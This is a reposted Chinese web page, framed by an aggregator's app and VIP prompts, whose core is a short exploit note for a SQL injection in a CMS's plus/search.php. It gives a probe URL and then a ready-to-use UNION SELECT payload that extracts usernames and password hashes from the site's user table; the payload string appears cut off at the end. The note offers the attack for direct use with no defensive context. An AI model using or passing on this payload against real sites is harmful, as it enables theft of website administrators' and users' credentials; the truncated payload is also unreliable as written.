打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
https://github.com/yuxiaokui/python

0x01    search 注入漏洞

xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
[通杀]dedecms plus/search.php 注入漏洞利用EXP
国人加密数字币交易平台API示例支持语言概览
一款针对网站的网络侦察和信息收集工具
2018 年 Web 开发者路线图:最全的教程、资源和在线课程
GitHub上最火的编程语言,你学会了吗?
那些被吐槽最多的编程语言
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服